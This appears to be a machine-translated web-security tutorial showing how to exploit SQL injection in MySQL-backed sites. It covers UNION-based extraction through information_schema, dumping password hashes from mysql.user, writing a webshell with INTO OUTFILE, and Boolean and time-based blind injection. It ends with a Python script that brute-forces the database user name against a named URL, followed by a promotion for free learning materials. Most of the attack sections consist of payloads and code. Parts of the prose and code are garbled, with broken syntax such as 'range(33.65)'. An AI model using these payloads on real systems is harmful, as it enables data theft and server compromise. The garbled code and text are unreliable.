preface
After finding an SQL injection vulnerability, what can we do with it? So this article brings you is the SQL injection vulnerability utilization technology, now it is time for us to experience the fun of vulnerability utilization.
Section 3 uses SQL injection
3.1. Identify database
To launch an SQL injection attack, you need to know which system database you are using, or you cannot extract important data.
First from the Web application technology to provide us with a judgment of clues: ASP and. NET: Microsoft SQL Server PHP: MySQL, PostgreSQL Java: Oracle, MySQL
Web containers also provide clues, such as installing IIS as the Server platform, background data and most likely Microsoft SQL Server, while Linux servers that allow Apache and PHP are likely to use open source databases such as MySQL and PostgreSQL.
Based on the error identification database
In most cases, a detailed error message is all you need to know about the database behind it. For example, to determine the database used in our example, let’s put it in single quotes. [SQL]
error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' '' at line 1
Copy the code
From the error message, we can see that it is MySQL. [SQL]
Microsoft OLE DB Provider forODBC Drivers mistake'80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1:
Copy the code
If the error message begins with ‘ORA’, you can determine whether the database is Oracle.
Extrapolation based on numerical functions
Database server | function |
---|---|
Microsoft SQL Server | @ @ pack_received, @ @ rowcount |
MySQL | Connection_id (), last_insert_id(), row_count() |
Oracle | BITAND (1, 1) |
PostgreSQL | select EXTRACT(DOW FROM NOW()) |
Here’s an example of the environment we built:
Connection_id (), whatever value it has, is basically positive, so it’s true. Last_insert_id (), where the insert_id() value is last_insert_id(), does not have insert statements, so by default it returns zero, so it’s false.
So if and connection_id() returns normal and and last_insert_id() does not return data, we can infer that this is a MySQL database.
3.2. UINON statement to extract data
The UNION operator can combine the results of two or more SELECT statements. The basic syntax is as follows: [SQL]
select column- 1 column2 - from table- 1
UNION
select column- 1 column2 - from table2 -
Copy the code
If the application returns the data from the first query, we can add an arbitrary query to extract the data by injecting a UNION operator after the first query
Two conditions:
- Both queries must return the same number of columns
- Both query statements must return the same data type for columns
First, let’s look at the first condition. How do we know the number of columns in the first query? We can try with NULL, and since NULL values are converted to any data type, we don’t care about the second condition.Just add them one by one until no error is returned.
The magic ORDER BY clause
In addition to the above method, we can also use the Order BY clause to get the exact number of columnsSo we try 12, we get an error, so the number of columns is less than 12, we try 6, we get an error, and the same thing, we try 3, we get normal, so the number of columns is greater than or equal to 3, we try 4, we get an error. If the number of columns is less than 4, the number of columns is greater than or equal to 3, and the number of columns is less than 4, the number of columns is 3. Using the Order BY clause helps us quickly get the number of columns.
And once we have the number of columns, we have to satisfy the second conditionSimply replace NULL with our test string one column at a time. You can see that the first and second columns can hold strings, and the third column has no output.
Next let’s extract the database user name and version number:
3.3 enumeration database
Enumerating the database and extracting the data follow a hierarchical approach. First we extract the database name, then we extract the tables, then the columns, and finally the data itself. To get the tables and columns of a remote database, you need to access specialized tables that describe the various database structures. This structural description information is usually referred to as metadata. In MySQL, these tables are stored in the information_SCHEMA database
First step: extraction in MySQL database, the database name in information_schema schema_name schemata under the database table field [SQL]
id=1 union select null,schema_name,null from information_schema.schemata
Copy the code
In MySQL, table names are stored in table table_name of database information_SCHEMA
[SQL] Plain text view copy code
? id=1 union select null,table_name,null from information_schema.tables where table_schema='ichunqiu'
Copy the code
In this case, I use the WHERE clause to filter. Only table names under ichunqiu are returned. If I want to return all table names, I just need to remove the WHERE clause.
Step 3: Extract column names In MySQL, column names are stored in column_name of the COLUMNS table in the information_SCHEMA database
Also add a WHERE clause, so you don’t even know which database and which table the field name belongs to.
Step 4: Extract the data this step is easy, I won’t introduce it, look at the picture.
3.4, steal hash can be made
MySQL > select * from mysql.user where password is stored;
The hash PASSWORD is calculated using the PASSWORD() function:
The algorithm depends on the version of MySQL installed.
3.5. Get WebShell
Using SQL injection attacks to get WebShell is actually writing files to the server. (Note: here we need to get the absolute path to the site.) All common relational database management systems (RDBMSS) include built-in capabilities to write files to the server file system. [SQL]
select into outfile(dumpfile) //MySQL write file command
Copy the code
For example: [SQL]
select "
" into outfile "F:\\www\\test.php";
Copy the code
So other relational database management systems the same principle of writing files, not too much introduction.
Section 4 Use of SQL blind annotation
4.1. Initial understanding of SQL blind annotation
SQL blind annotation refers to the technique of extracting information from or related to a database query by using the input review vulnerability of a database query when detailed database error messages or in-band data connections cannot be used.
Common BLIND SQL injection scenarios:
A generic error page will be returned if a submission causes an invalid SQL query, and a page with moderately controlled content will be returned if a correct submission is made.
A generic error page will be returned if a query is submitted that causes an invalid SQL query. A page with uncontrollable content will be returned if the query is submitted correctly.
Submitting corrupt or incorrect SQL will neither produce an error page nor affect the page output in any way.
4.2. SQL blind Injection technology – Based on Boolean
With the SQL definition and injection scenarios for these vulnerabilities in mind, I’ll now take a closer look at the techniques that exploit them.
First we submit the error SQL to see if the resource returns the generic error page.
Can we control the output of the page?
Obviously [SQL]
id=1 and 1=1 True
id=1 and 1=2 False
Copy the code
How?
Before I introduce the use of tricks, let’s introduce an important SQL function
[SQL] Plain text view copy code
SUBSTRING(str,pos,len)
Copy the code
The form without len returns a string starting from the string STR at position pos. A len argument of the form returns a substring of the len character string STR, starting at position pos, using standard SQL syntax. Alternatively, a negative value of pos can be used. In this case, the character at the beginning of the substring position ends the string, not the beginning. The negative value can be used for pos in any form in this function.
Example Use – User name for obtaining data
[SQL]
id=1 and SUBSTRING(user(), 1, 1)='a'
SUBSTRING(); SUBSTRING(); SUBSTRING(); The page returns True if it is equal to False.
Copy the code
[SQL]
id=1 and SUBSTRING(user(), 1, 1)='r'
# return True, which means the page is normal and the user name starts with r
Copy the code
This is also based on Boolean SQL blind injection technology
4.3 blind INJECTION of SQL based on time
Similar to the Boolean based SQL blind injection technique, the response is paused for a few seconds when a state is true, and no pause occurs when the state is false.
No more nonsense to see the use of skills.
[SQL]
id=1 union select if(SUBSTRING(user(), 1, 4)='root',sleep(4),1),null.null
# Pay attention to the condition of using union, as described above. In the same way, extracting the first four characters of the user name for judgment, the correct delay of 4 seconds, error returns 1
Copy the code
4.4. Our good friend -Python
Example of getting a user name using Automated Injection in Python:
MySQL extracts user names for comparison is case insensitive, so we remove the uppercase letters. The code is so simple that I won’t explain it. [Python]
import requests
def attack():
print 'launch an attack'
url = 'http://www.isbase.com/sqlbool.php'
user = '[+]system_user: '
zimu1 = range(33.65)
zimu2 = range(91.128)
zimu = zimu1 + zimu2
for l in range(1.16) :for i in zimu:
payload = "and SUBSTRING(user(),"+str(l)+", 1) = "" + chr(i) + "'"
payload = {'id': '1' + payload}
r = requests.get(url, params=payload)
wenben = r.text
wenben = wenben.encode("utf-8")
result = wenben.find("jim")
if(result ! =- 1):
user = user + chr(i)
print user
if __name__ == '__main__':
print 'Author:zusheng'
print 'bbs:ichunqiu.com'
attack()
print '[+]ok'
Copy the code
conclusion
Thank you for your support. I feel very satisfied with my writing, but it is not perfect. I hope I can bring you more elite articles in the future. There is a final advanced section. Keep it up and try to bring you more detailed and in-depth articles. Technology is limited, if there are mistakes in the article, please point out, thank you.
Thank you for your support, here I also summarize the in front of their own is not enough, because the space is very long, width is in place, but there is no further, is not detailed, so this tutorial is divided into three levels to write, as well as depth to width, and of course I am not a technology, such as there are errors, please point out, I will correct them.
Finally, to thank the readers, I would like to share with you some of my favorites of cyber security/penetration testing learning materials to give back to each and every reader, hoping to help you.
Dry goods are mainly:
① More than 2000 online security must-read e-books (mainstream and classic books should be available)
PHP standard Library data (the most complete Chinese version)
(3) project source code (forty or fifty interesting and classic practice projects and source code)
④ Network security basic entry, Linux operation and maintenance, Web security, penetration testing video (suitable for white learning)
⑤ Network security learning roadmap (farewell to the flow of learning)
⑥ Penetration test tools
⑦ 2021 Network security /Web security/penetration test engineer interview manual encyclopedia
Due to the limited space, all the information is put in my personal document. If necessary, click the “Data Collection” below to get it.